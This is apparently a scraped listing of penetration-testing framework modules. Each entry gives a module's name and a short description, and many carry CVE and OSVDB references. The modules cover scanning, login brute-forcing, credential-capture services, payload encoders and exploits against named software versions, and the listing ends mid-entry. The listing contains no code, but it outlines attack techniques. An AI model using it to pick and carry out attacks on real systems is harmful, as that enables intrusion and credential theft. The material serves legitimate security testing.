This module querys the remote host for the EMC Alphastor Library Management Service.
Finger Service User Enumerator
Identify valid users through the finger service using a variety of tricks
Anonymous FTP Access Detection
Detect anonymous (read/write) FTP server access.
http://en.wikipedia.org/wiki/...
FTP Authentication Scanner
This module will test FTP logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
FTP Version Scanner
Detect FTP Version.
Apache Axis2 v1.4.1 Local File Inclusion
This module exploits an Apache Axis2 v1.4.1 local file inclusion (LFI) vulnerability. By loading a local XML file which contains a cleartext username and password, attackers can trivially recover authentication credentials to Axis services.
http://www.exploit-db.com/exp...
OSVDB-59001
Apache Axis2 v1.4.1 Brute Force Utility
This module attempts to login to an Apache Axis2 v1.4.1 instance using username and password combindations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.
HTTP Backup File Scanner
This module identifies the existence of possible copies of a specific file in a given path.
HTTP Blind SQL Injection GET QUERY Scanner
This module identifies the existence of Blind SQL injection issues in GET Query parameters values.
HTTP Directory Brute Force Scanner
This module identifies the existence of interesting directories by brute forcing the name in a given directory path.
HTTP SSL Certificate Checker
This module will check the certificate of the specified web servers to ensure the subject and issuer match the supplied pattern and that the certificate is not expired. Note: Be sure to check your expression if using msfcli, shells tend to not like certain things and will strip/interpret them (= is a perfect example). It is better to use in console.
HTTP Copy File Scanner
This module identifies the existence of possible copies of a specific file in a given path.
HTTP Directory Listing Scanner
This module identifies directory listing vulnerabilities in a given directory path.
HTTP Directory Scanner
This module identifies the existence of interesting directories in a given directory path.
MS09-020 IIS6 WebDAV Unicode Auth Bypass Directory Scanner
This module is based on et's HTTP Directory Scanner module, with one exception. Where authentication is required, it attempts to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. The vulnerability appears to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication.
MSB-MS09-020
CVE-2009-1535
CVE-2009-1122
OSVDB-54555
BID-34993
Pull Del.icio.us Links (URLs) for a domain
This module pulls and parses the URLs stored by Del.icio.us users for the purpose of replaying during a web assessment. Finding unlinked and old pages.
Pull Archive.org stored URLs for a domain
This module pulls and parses the URLs stored by Archive.org for the purpose of replaying during a web assessment. Finding unlinked and old pages.
HTTP Error Based SQL Injection Scanner
This module identifies the existence of Error Based SQL injection issues. Still requires alot of work
HTTP File Same Name Directory Scanner
This module identifies the existence of files in a given directory path named as the same name of the directory. Only works if PATH is differenet than '/'.
HTTP Interesting File Scanner
This module identifies the existence of interesting files in a given directory path.
FrontPage Server Extensions Login Utility
This module queries the FrontPage Server Extensions and determines whether anonymous access is allowed.
http://en.wikipedia.org/wiki/...
http://msdn2.microsoft.com/en...
HTTP Login Utility
This module attempts to authenticate to an HTTP service.
HTTP Version Detection
Display version information about each system
JBoss Vulnerability Scanner
This module scans a JBoss instance for a few vulnerablities.
CVE-2010-0738
LiteSpeed Source Code Disclosure/Download
This module exploits a source code disclosure/download vulnerability in versions 4.0.14 and prior of LiteSpeed.
CVE-2010-2333
OSVDB-65476
BID-40815
http://www.exploit-db.com/exp...
HTTP Microsoft SQL Injection Table XSS Infection
This module implements the mass SQL injection attack in use lately by concatenation of HTML string that forces a persistant XSS attack to redirect user browser to a attacker controller website.
MS09-020 IIS6 WebDAV Unicode Auth Bypass
Simplified version of MS09-020 IIS6 WebDAV Unicode Auth Bypass scanner. It attempts to bypass authentication using the WebDAV IIS6 Unicode vulnerability discovered by Kingcope. The vulnerability appears to be exploitable where WebDAV is enabled on the IIS6 server, and any protected folder requires either Basic, Digest or NTLM authentication.
MSB-MS09-020
CVE-2009-1535
CVE-2009-1122
OSVDB-54555
BID-34993
Nginx Source Code Disclosure/Download
This module exploits a source code disclosure/download vulnerability in versions of the nginx web server between 0.7.56 and 0.8.40 (inclusive).
CVE-2010-2263
OSVDB-65531
BID-40760
HTTP Open Proxy Detection
Checks if an HTTP proxy is open. False positive are avoided verifing the HTTP return code and matching a pattern.
http://en.wikipedia.org/wiki/...
http://nmap.org/svn/scripts/h...
HTTP Options Detection
Display available HTTP options for each system
HTTP Previous Directory File Scanner
This module identifies files in the first parent directory with same name as the given directory path. Example: Test /backup/files/ will look for the following files /backup/files.ext .
HTTP File Extension Scanner
This module identifies the existence of additional files by modifying the extension of an existing file.
HTTP Robots.txt Content Scanner
Detect robots.txt files and analize its content
HTTP SOAP Verb/Noun Brute Force Scanner
This module attempts to brute force SOAP/XML requests to uncover hidden methods.
SQLMAP SQL Injection External Module
This module launch a sqlmap session. sqlmap is an automatic SQL injection tool developed in Python. Its goal is to detect and take advantage of SQL injection vulnerabilities on web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user specific DBMS tables/columns, run his own SQL SELECT statement, read specific files on the file system and much more.
http://sqlmap.sourceforge.net
HTTP SSL Certificate Information
Parse the server SSL certificate to obtain the common name and signature algorithm
HTTP Subversion Scanner
Detect subversion directories and files and analize its content. Only SVN Version > 7 supported
Apache Tomcat User Enumeration
Apache Tomcat user enumeration utility, for Apache Tomcat servers prior to version 6.0.20, 5.5.28, and 4.1.40.
BID-35196
CVE-2009-0580
OSVDB-55055
Tomcat Application Manager Login Utility
This module simply attempts to login to a Tomcat Application Manager instance using a specific user/pass.
CVE-2009-3843
OSVDB-60317
BID-37086
CVE-2009-4189
OSVDB-60670
http://www.harmonysecurity.co...
http://www.zerodayinitiative....
CVE-2009-4188
BID-38084
CVE-2010-0557
http://www-01.ibm.com/support...
CVE-2009-3548
OSVDB-60176
BID-36954
http://tomcat.apache.org/
HTTP trace.axd Content Scanner
Detect trace.axd files and analize its content
HTTP Verb Authentication Bypass Scanner
This module test for authentication bypass using different HTTP verbs.
HTTP Virtual Host Brute Force Scanner
This module tries to identify unique virtual hosts hosted by the target web server.
VMware Server Directory Transversal Vulnerability
This modules exploits the VMware Server Directory traversal vulnerability in VMware Server 1.x before 1.0.10 build 203137 and 2.x before 2.0.2 build 203138 on Linux, VMware ESXi 3.5, and VMware ESX 3.0.3 and 3.5 allows remote attackers to read arbitrary files. Common VMware server ports 80/8222 and 443/8333 SSL. If you want to download the entire VM, check out the gueststealer tool.
http://www.vmware.com/securit...
OSVDB-59440
BID-36842
CVE-2009-3733
http://fyrmassociates.com/too...
HTTP Vuln scanner
This module identifies common vulnerable files or cgis.
HTTP WebDAV Internal IP Scanner
Detect webservers internal IPs though WebDAV
HTTP WebDAV Scanner
Detect webservers with WebDAV enabled
HTTP WebDAV Website Content Scanner
Detect webservers disclosing its content though WebDAV
Wordpress Brute Force and User Enumeration Utility
Wordpress Authentication Brute Force and User Enumeration Utility
BID-35581
CVE-2009-2335
OSVDB-55713
HTTP Writable Path PUT/DELETE File Access
This module can abuse misconfigured web servers to upload and delete web content via PUT and DELETE HTTP requests.
HTTP Blind XPATH 1.0 Injector
This module exploits blind XPATH 1.0 injections over HTTP GET requests.
IMAP4 Banner Grabber
IMAP4 Banner Grabber
IPID Sequence Scanner
This module will probe hosts' IPID sequences and classify them using the same method Nmap uses when it's performing its IPID Idle Scan (-sI) and OS Detection (-O). Nmap's probes are SYN/ACKs while this module's are SYNs. While this does not change the underlying functionality, it does change the chance of whether or not the probe will be stopped by a firewall. Nmap's Idle Scan can use hosts whose IPID sequences are classified as "Incremental" or "Broken little-endian incremental".
Lotus Domino Password Hash Collector
Get users passwords hashs from names.nsf page
Lotus Domino Brute Force Utility
Lotus Domino Authentication Brute Force Utility
Lotus Domino Version
Several checks to determine Lotus Domino Server Version.
Borland InterBase Services Manager Information
This module retrieves version of the services manager, version and implementation of the InterBase server from InterBase Services Manager.
SunRPC Portmap Program Enumerator
This module calls the target portmap service and enumerates all program entries and their running port numbers.
http://www.ietf.org/rfc/rfc10...
Motorola Timbuktu Service Detection.
This module simply sends a packet to the Motorola Timbuktu service for detection.
MSSQL Login Utility
This module simply queries the MSSQL instance for a specific user/pass (default is sa with blank).
MSSQL Ping Utility
This module simply queries the MSSQL instance for information.
MySQL Login Utility
This module simply queries the MySQL instance for a specific user/pass (default is root with blank).
MySQL Server Version Enumeration
Enumerates the version of MySQL servers
NetBIOS Information Discovery
Discover host information through NetBIOS
NetBIOS Information Discovery Prober
Discover host information using sequential NetBIOS Probes
NFS Mount Scanner
This module scans NFS mounts and their permissions.
CVE-1999-0170
http://www.ietf.org/rfc/rfc10...
NTP Monitor List Scanner
Obtain the list of recent clients from an NTP server
Oracle Enterprise Manager Control SID Discovery
This module makes a request to the Oracle Enterprise Manager Control Console in an attempt to discover the SID.
http://dsecrg.com/files/pub/p...
Oracle SID Enumeration.
This module simply queries the TNS listner for the Oracle SID. With Oracle 9.2.0.8 and above the listener will be protected and the SID will have to be bruteforced or guessed.
Oracle Application Server Spy Servlet SID Enumeration.
This module makes a request to the Oracle Application Server in an attempt to discover the SID.
http://dsecrg.com/files/pub/p...
Oracle tnslsnr Service Version Query.
This module simply queries the tnslsnr service for the Oracle build.
Oracle XML DB SID Discovery
This module simply makes a authenticated request to retrieve the sid from the Oracle XML DB httpd server.
http://dsecrg.com/files/pub/p...
Oracle XML DB SID Discovery via Brute Force
This module attempts to retrieve the sid from the Oracle XML DB httpd server, utilizing Pete Finnigan s default oracle password list.
http://dsecrg.com/files/pub/p...
http://www.petefinnigan.com/d...
POP3 Banner Grabber
POP3 Banner Grabber
TCP ACK Firewall Scanner
Map out firewall rulesets with a raw ACK scan. Any unfiltered ports found means a stateful firewall is not in place for them.
FTP Bounce Port Scanner
Enumerate TCP services via the FTP bounce PORT/LIST method, which can still come in handy every once in a while (I know of a server that still allows this just fine...).
TCP SYN Port Scanner
Enumerate open TCP services using a raw SYN scan.
TCP Port Scanner
Enumerate open TCP services
TCP "XMas" Port Scanner
Enumerate open|filtered TCP services using a raw "XMas" scan; this sends probes containing the FIN, PSH and URG flags.
PostgreSQL Login Utility
This module attempts to authenticate against a PostgreSQL instance using username and password combinations indicated by the USER_FILE, PASS_FILE, and USERPASS_FILE options.
http://www.postgresql.org
PostgreSQL Version Probe
Enumerates the verion of PostgreSQL servers.
www.postgresql.org
Rogue Gateway Detection: Receiver
This module listens for replies to the requests sent by the rogue_send module. The RPORT, CPORT, and ECHOID values must match the rogue_send parameters used exactly.
http://www.metasploit.com/res...
Rogue Gateway Detection: Sender
This module send a series of TCP SYN and ICMP ECHO requests to each internal target host, spoofing the source address of an external system running the rogue_recv module. This allows the system running the rogue_recv module to determine what external IP a given internal system is using as its default route.
http://www.metasploit.com/res...
SIP Username Enumerator (UDP)
Scan for numeric username/extensions using OPTIONS/REGISTER requests
SIP Username Enumerator (TCP)
Scan for numeric username/extensions using OPTIONS/REGISTER requests
SIP Endpoint Scanner (UDP)
Scan for SIP devices using OPTIONS requests
SIP Endpoint Scanner (TCP)
Scan for SIP devices using OPTIONS requests
SMB Session Pipe Auditor
Determine what named pipes are accessible over SMB
SMB Session Pipe DCERPC Auditor
Determine what DCERPC services are accessible over a SMB pipe
SMB 2.0 Protocol Detection
Detect systems that support the SMB 2.0 protocol
SMB Share Enumeration
Determine what shares are provided by the SMB service
SMB User Enumeration (SAM EnumUsers)
Determine what local users exist via the SAM RPC service
SMB Login Check Scanner
This module will test a SMB login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
SMB Local User Enumeration (LookupSid)
Determine what local users exist via brute force SID lookups
SMB Version Detection
Display version information about each system
SMTP User Enumeration Utility
The SMTP service has two internal commands that allow the enumeration of users: VRFY (confirming the names of valid users) and EXPN (which reveals the actual address of users aliases and lists of e-mail (mailing lists)). Through the implementation of these SMTP commands can reveal a list of valid users.
http://www.ietf.org/rfc/rfc28...
OSVDB-12551
CVE-1999-0531
SMTP Banner Grabber
SMTP Banner Grabber
http://www.ietf.org/rfc/rfc28...
AIX SNMP Scanner Auxiliary Module
AIX SNMP Scanner Auxiliary Module
SNMP Community Scanner
Scan for SNMP devices using common community names
SSH Login Check Scanner
This module will test ssh logins on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
SSH Public Key Login Scanner
This module will test ssh logins on a range of machines using a defined private key file, and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access. Note that password-protected key files will not function with this module -- it is designed specifically for unencrypted (passwordless) keys. Key files may be a single private (unencrypted) key, or several private keys concatenated together as an ASCII text file. Non-key data should be silently ignored.
SSH Version Scannner
Detect SSH Version.
http://en.wikipedia.org/wiki/...
Wardialer
Scan for dial-up systems that are connected to modems and answer telephony indials.
Telnet Login Check Scanner
This module will test a telnet login on a range of machines and report successful logins. If you have loaded a database plugin and connected to a database this module will record successful logins and hosts so you can track your access.
Telnet Service Banner Detection
Detect telnet services
TFTP Brute Forcer
This module uses a dictionary to brute force valid TFTP image names from a TFTP server.
VNC Authentication None Detection
Detect VNC server with empty password.
http://en.wikipedia.org/wiki/RFB
http://en.wikipedia.org/wiki/Vnc
X11 No-Auth Scanner
This module scans for X11 servers that allow anyone to connect without authentication.
OSVDB-309
CVE-1999-0526
HTTP Client Automatic Exploiter
This module uses a combination of client-side and server-side techniques to fingerprint HTTP clients and then automatically exploit them.
Authentication Capture: FTP
This module provides a fake FTP service that is designed to capture authentication credentials.
Authentication Capture: HTTP
This module provides a fake HTTP service that is designed to capture authentication credentials.
HTTP Client MS Credential Catcher
This module attempts to quietly catch NTLM/LM Challenge hashes.
Authentication Capture: IMAP
This module provides a fake IMAP service that is designed to capture authentication credentials.
Authentication Capture: POP3
This module provides a fake POP3 service that is designed to capture authentication credentials.
Authentication Capture: SMB
This module provides a SMB service that can be used to capture the challenge-response password hashes of SMB client systems. All responses sent by this service have the same hardcoded challenge string (\x11\x22\x33\x44\x55\x66\x77\x88), allowing for easy cracking using Cain & Abel or L0phtcrack. To exploit this, the target system must try to authenticate to this module. The easiest way to force a SMB authentication attempt is by embedding a UNC path (\\SERVER\SHARE) into a web page or email message. When the victim views the web page or email, their system will automatically connect to the server specified in the UNC share (the IP address of the system running this module) and attempt to authenticate.
Authentication Capture: SMTP
This module provides a fake SMTP service that is designed to capture authentication credentials.
Authentication Capture: Telnet
This module provides a fake Telnet service that is designed to capture authentication credentials. DONTs and WONTs are sent to the client for all option negotiations, except for ECHO at the time of the password prompt since the server controls that for a bit more realism.
DNS Spoofing Helper Service
This module provides a DNS service that returns TXT records indicating information about the querying service. Based on Dino Dai Zovi DNS code from Karma.
Fake DNS Service
This module provides a DNS service that redirects all queries to a particular address.
File Format Exploit Generator
This module generates a combination of File format exploits and make them available to a client. 94.7% Based on browser autopwn by egypt.
FTP File Server
This module provides a FTP service
SOCKS Proxy UNC Path Redirection
This module provides a Socks proxy service that redirects all HTTP requests to a web page that loads a UNC path.
TFTP File Server
This module provides a TFTP service
pSnuffle Packet Sniffer
This module sniffs passwords like dsniff did in the past
Forge Cisco DTP Packets
This module forges DTP packets to initialize a trunk port.
DNS BailiWicked Domain Attack
This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit replaces the target domains nameserver entries in a vulnerable DNS cache server. This attack works by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and the nameserver entries for the target domain will be replaced by the server specified in the NEWDNS option of this exploit.
CVE-2008-1447
OSVDB-46776
US-CERT-VU-800113
http://www.caughq.org/exploit...
DNS BailiWicked Host Attack
This exploit attacks a fairly ubiquitous flaw in DNS implementations which Dan Kaminsky found and disclosed ~Jul 2008. This exploit caches a single malicious host entry into the target nameserver by sending random hostname queries to the target DNS server coupled with spoofed replies to those queries from the authoritative nameservers for that domain. Eventually, a guessed ID will match, the spoofed packet will get accepted, and due to the additional hostname entry being within bailiwick constraints of the original request the malicious host entry will get cached.
CVE-2008-1447
OSVDB-46776
US-CERT-VU-800113
http://www.caughq.org/exploit...
DNS Lookup Result Comparison
This module can be used to determine differences in the cache entries between two DNS servers. This is primarily useful for detecting cache poisoning attacks, but can also be used to detect geo-location loadbalancing.
Airpwn TCP hijack
TCP streams are 'protected' only in so much as the sequence number is not guessable. Wifi is shared media. Got your nose. Responses which do not begin with Header: Value assumed to be HTML only and will have Header:Value data prepended. Responses which do not include a Content-Length header will have one generated.
DNSpwn DNS hijack
Race DNS responses and replace DNS queries
SQL Injection via SYS.DBMS_CDC_IPUBLISH.ALTER_HOTLOG_INTERNAL_CSOURCE
The module exploits an sql injection flaw in the ALTER_HOTLOG_INTERNAL_CSOURCE procedure of the PL/SQL package DBMS_CDC_IPUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU.
CVE-2008-3996
OSVDB-49321
http://www.appsecinc.com/reso...
SQL Injection via SYS.DBMS_CDC_PUBLISH.ALTER_AUTOLOG_CHANGE_SOURCE
The module exploits an sql injection flaw in the ALTER_AUTOLOG_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege. Affected versions: Oracle Database Server versions 10gR1, 10gR2 and 11gR1. Fixed with October 2008 CPU.
CVE-2008-3995
OSVDB-49320
http://www.appsecinc.com/reso...
SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE
The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege on the vulnerable package can exploit this vulnerability. By default, users granted EXECUTE_CATALOG_ROLE have the required privilege.
CVE-2010-0870
OSVDB-63772
http://www.oracle.com/technol...
SQL Injection via DBMS_EXPORT_EXTENSION.
This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_METADATA package. Note: This module has been tested against 9i, 10gR1 and 10gR2.
CVE-2006-2081
OSVDB-25002
BID-17699
http://www.red-database-secur...
SQL Injection via SYS.DBMS_METADATA.GET_GRANTED_XML.
This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.DBMS_METADATA.GET_GRANTED_XML package/function.
http://www.metasploit.com
SQL Injection via SYS.DBMS_METADATA.GET_XML.
This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.DBMS_METADATA.GET_XML package/function.
http://www.metasploit.com
SQL Injection via SYS.DBMS_METADATA.OPEN.
This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.DBMS_METADATA.OPEN package/function.
http://www.metasploit.com
SQL Injection in MDSYS.SDO_TOPO_DROP_FTBL Trigger.
This module will escalate a Oracle DB user to MDSYS by exploiting an sql injection bug in the MDSYS.SDO_TOPO_DROP_FTBL trigger. After that exploit escalate user to DBA using "CREATE ANY TRIGGER" privilege given to MDSYS user by creating evil trigger in system scheme (2-stage attack).
CVE-2008-3979
OSVDB-51354
http://www.securityfocus.com/...
http://www.ngssoftware.com/
DBMS_JVM_EXP_PERMS 10gR2, 11gR1/R2 OS Command Execution
This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield. Works on 10g R2, 11g R1 and R2 (Windows only)
CVE-2010-0866
OSVDB-62184
http://blackhat.com/html/bh-d...
http://www.notsosecure.com/fo...
DBMS_JVM_EXP_PERMS 11g R1/R2 OS Code Execution
This module exploits a flaw (0 day) in DBMS_JVM_EXP_PERMS package that allows any user with create session privilege to grant themselves java IO privileges. Identified by David Litchfield. Works on 11g R1 and R2 (Windows only).
CVE-2010-0866
OSVDB-62184
http://blackhat.com/html/bh-d...
http://www.notsosecure.com/fo...
SQL Injection via SYS.LT.COMPRESSWORKSPACE.
This module exploits an sql injection flaw in the COMPRESSWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
CVE-2008-3982
OSVDB-49324
http://www.oracle.com/technol...
http://www.appsecinc.com/reso...
SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method
This module will escalate a Oracle DB user to DBA by exploiting an sql injection bug in the SYS.LT.FINDRICSET package via Evil Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical Patch update October 2007.
CVE-2007-5511
OSVDB-40079
BID-26098
http://rawlab.mindcreations.c...
http://www.oracle.com/technol...
SQL Injection via SYS.LT.MERGEWORKSPACE.
This module exploits an sql injection flaw in the MERGEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
CVE-2008-3983
OSVDB-49325
http://www.oracle.com/technol...
http://www.appsecinc.com/reso...
http://www.dsecrg.com/pages/e...
SQL Injection via SYS.LT.REMOVEWORKSPACE.
This module exploits an sql injection flaw in the REMOVEWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
CVE-2008-3984
OSVDB-49326
http://www.appsecinc.com/reso...
SQL Injection via SYS.LT.ROLLBACKWORKSPACE.
This module exploits an sql injection flaw in the ROLLBACKWORKSPACE procedure of the PL/SQL package SYS.LT. Any user with execute privilege on the vulnerable package can exploit this vulnerability.
CVE-2009-0978
OSVDB-53734
http://www.oracle.com/technol...
Simple Network Capture Tester
This module sniffs HTTP GET requests from the network
Simple Ethernet Frame Spoofer
This module sends spoofed ethernet frames
FTP Client Exploit Mixin DATA test Exploit
This module tests the "DATA" functionality of the ftp client exploit mixin.
Simple IP Spoofing Tester
Simple IP Spoofing Tester
Simple Recon Module Tester
Simple Recon Module Tester
Simple Recon Module Tester
Simple Recon Module Tester
Simple Recon Module Tester
Simple Recon Module Tester
Simple Recon Module Tester
Simple Recon Module Tester
SIP Invite Spoof
This module will create a fake SIP invite request making the targeted device ring and display fake caller id information.
Generic Shell Variable Substitution Command Encoder
This encoder uses standard Bourne shell variable substitution tricks to avoid commonly restricted characters.
Generic ${IFS} Substitution Command Encoder
This encoder uses standard Bourne shell variable substitution to avoid spaces without being overly fancy.
Generic printf(1) Utility Command Encoder
This encoder uses the printf(1) utility to avoid restricted characters. Some shell variable substituion may also be used \if needed symbols are blacklisted.
The "none" Encoder
This "encoder" does not transform the payload in any way.
XOR Encoder
Mips Web server exploit friendly xor encoder
XOR Encoder
Mips Web server exploit friendly xor encoder
PHP Base64 encoder
This encoder returns a base64 string encapsulated in eval(base64_decode()), increasing the size by a bit more than one third.
PPC LongXOR Encoder
This encoder is ghandi's PPC dword xor encoder with some size tweaks by HDM.
PPC LongXOR Encoder
This encoder is ghandi's PPC dword xor encoder but uses a tag-based terminator rather than a length.
SPARC DWORD XOR Encoder
This encoder is optyx's 48-byte SPARC encoder with some tweaks.
XOR Encoder
An x64 XOR encoder. Uses an 8 byte key and takes advantage of x64 relative addressing.
Alpha2 Alphanumeric Mixedcase Encoder
Encodes payloads as alphanumeric mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite.
Alpha2 Alphanumeric Uppercase Encoder
Encodes payloads as alphanumeric uppercase text. This encoder uses SkyLined's Alpha2 encoding suite.
Avoid UTF8/tolower
UTF8 Safe, tolower Safe Encoder
Call+4 Dword XOR Encoder
Call+4 Dword XOR Encoder
CPUID-based Context Keyed Payload Encoder
This is a Context-Keyed Payload Encoder based on CPUID and Shikata Ga Nai.
stat(2)-based Context Keyed Payload Encoder
This is a Context-Keyed Payload Encoder based on stat(2) and Shikata Ga Nai.
time(2)-based Context Keyed Payload Encoder
This is a Context-Keyed Payload Encoder based on time(2) and Shikata Ga Nai.
Single-byte XOR Countdown Encoder
This encoder uses the length of the payload as a position-dependent encoder key to produce a small decoder stub.
Variable-length Fnstenv/mov Dword XOR Encoder
This encoder uses a variable-length mov equivalent instruction with fnstenv for getip.
Jump/Call XOR Additive Feedback Encoder
Jump/Call XOR Additive Feedback
Non-Alpha Encoder
Encodes payloads as non-alpha based bytes. This allows payloads to bypass both toupper() and tolower() calls, but will fail isalpha(). Table based design from Russel Sanford.
Non-Upper Encoder
Encodes payloads as non-alpha based bytes. This allows payloads to bypass tolower() calls, but will fail isalpha(). Table based design from Russel Sanford.
Polymorphic XOR Additive Feedback Encoder
This encoder implements a polymorphic XOR additive feedback encoder. The decoder stub is generated based on dynamic instruction substitution and dynamic block ordering. Registers are also selected dynamically.
Single Static Bit
Static value for specific bit
Alpha2 Alphanumeric Unicode Mixedcase Encoder
Encodes payloads as unicode-safe mixedcase text. This encoder uses SkyLined's Alpha2 encoding suite.
Alpha2 Alphanumeric Unicode Uppercase Encoder
Encodes payloas as unicode-safe uppercase text. This encoder uses SkyLined's Alpha2 encoding suite.
AIX Calendar Manager Service Daemon (rpc.cmsd) Opcode 21 Buffer Overflow
This module exploits a buffer overflow vulnerability in opcode 21 handled by rpc.cmsd on AIX. By making a request with a long string passed to the first argument of the "rtable_create" RPC, a stack based buffer overflow occurs. This leads to arbitrary code execution. NOTE: Unsuccessful attempts may cause inetd/portmapper to enter a state where further attempts are not possible.
CVE-2009-3699
OSVDB-58726
BID-36615
http://labs.idefense.com/inte...
http://aix.software.ibm.com/a...
ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow
This module exploits a buffer overflow vulnerability in _tt_internal_realpath function of the ToolTalk database server (rpc.ttdbserverd).
CVE-2009-2727
OSVDB-55151
Mercantec SoftCart CGI Overflow
This is an exploit for an undisclosed buffer overflow in the SoftCart.exe CGI as shipped with Mercantec's shopping cart software. It is possible to execute arbitrary code by passing a malformed CGI parameter in an HTTP GET request. This issue is known to affect SoftCart version 4.00b.
CVE-2004-2221
OSVDB-9011
BID-10926
System V Derived /bin/login Extraneous Arguments Buffer Overflow
This exploit connects to a system's modem over dialup and exploits a buffer overlflow vulnerability in it's System V derived /bin/login. The vulnerability is triggered by providing a large number of arguments.
CVE-2001-0797
OSVDB-690
OSVDB-691
BID-3681
http://archives.neohapsis.com...
http://archives.neohapsis.com...
Samba trans2open Overflow (*BSD x86)
This exploits the buffer overflow found in Samba versions 2.2.0 to 2.2.8. This particular module is capable of exploiting the flaw on x86 Linux systems that do not have the noexec stack option set.
CVE-2003-0201
OSVDB-4469
BID-7294
http://seclists.org/bugtraq/2...
XTACACSD <= 4.1.2 report() Buffer Overflow
This module exploits a stack buffer overflow in XTACACSD <= 4.1.2. By sending a specially crafted XTACACS packet with an overly long username, an attacker may be able to execute arbitrary code.
CVE-2008-7232
OSVDB-58140
http://aluigi.altervista.org/...
HP-UX LPD Command Execution
This exploit abuses an unpublished vulnerability in the HP-UX LPD service. This flaw allows an unauthenticated attacker to execute arbitrary commands with the privileges of the root user. The LPD service is only exploitable when the address of the attacking system can be resolved by the target. This vulnerability was silently patched with the buffer overflow flaws addressed in HP Security Bulletin HPSBUX0208-213.
CVE-2002-1473
OSVDB-9638
http://archives.neohapsis.com...
Irix LPD tagprinter Command Execution
This module exploits an arbitrary command execution flaw in the in.lpd service shipped with all versions of Irix.
CVE-2001-0800
OSVDB-8573
http://www.lsd-pl.net/code/IR...
Unreal Tournament 2004 "secure" Overflow (Linux)
This is an exploit for the GameSpy secure query in the Unreal Engine. This exploit only requires one UDP packet, which can be both spoofed and sent to a broadcast address. Usually, the GameSpy query server listens on port 7787, but you can manually specify the port as well. The RunServer.sh script will automatically restart the server upon a crash, giving us the ability to bruteforce the service and exploit it multiple times.
CVE-2004-0608
OSVDB-7217
BID-10570
Alcatel-Lucent OmniPCX Enterprise masterCGI Arbitrary Command Execution
This module abuses a metacharacter injection vulnerability in the HTTP management interface of the Alcatel-Lucent OmniPCX Enterprise Communication Server 7.1 and earlier. The Unified Maintenance Tool contains a 'masterCGI' binary which allows an unauthenticated attacker to execute arbitrary commands by specifing shell metacharaters as the 'user' within the 'ping' action to obtain 'httpd' user access. This module only supports command line payloads, as the httpd process kills the reverse/bind shell spawn after the HTTP 200 OK response.
OSVDB-40521
BID-25694
CVE-2007-3010
http://www1.alcatel-lucent.co...
DD-WRT HTTP Daemon Arbitrary Command Execution
This module abuses a metacharacter injection vulnerability in the HTTP management server of wireless gateways running DD-WRT. This flaw allows an unauthenticated attacker to execute arbitrary commands as the root user account.
CVE-2009-2765
OSVDB-55990
BID-35742
http://www.milw0rm.com/exploi...
Berlios GPSD Format String Vulnerability
This module exploits a format string vulnerability in the Berlios GPSD server. This vulnerability was discovered by Kevin Finisterre.
CVE-2004-1388
OSVDB-13199
BID-12371
http://www.securiteam.com/uni...
Linksys apply.cgi buffer overflow
This module exploits a stack buffer overflow in apply.cgi on the Linksys WRT54G and WRT54GS routers. According to iDefense who discovered this vulnerability, all WRT54G versions prior to 4.20.7 and all WRT54GS version prior to 1.05.2 may be be affected.
CVE-2005-2799
OSVDB-19389
http://labs.idefense.com/inte...
PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)
This module exploits a stack buffer overflow in PeerCast <= v0.1216. The vulnerability is caused due to a boundary error within the handling of URL parameters.
CVE-2006-1148
OSVDB-23777
BID-17040
http://www.infigo.hr/in_focus...
RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution
This module abuses two flaws - a metacharacter injection vulnerability in the HTTP management server of RedHat 6.2 systems running the Piranha LVS cluster service and GUI (rpm packages: piranha and piranha-gui). The vulnerability allows an authenticated attacker to execute arbitrary commands as the Apache user account (nobody) within the /piranha/secure/passwd.php3 script. The package installs with a default user and password of piranha:q which was exploited in the wild.
CVE-2000-0248
OSVDB-289
BID-1148
CVE-2000-0322
OSVDB-1300
BID-1149
Snort Back Orifice Pre-Preprocessor Remote Exploit
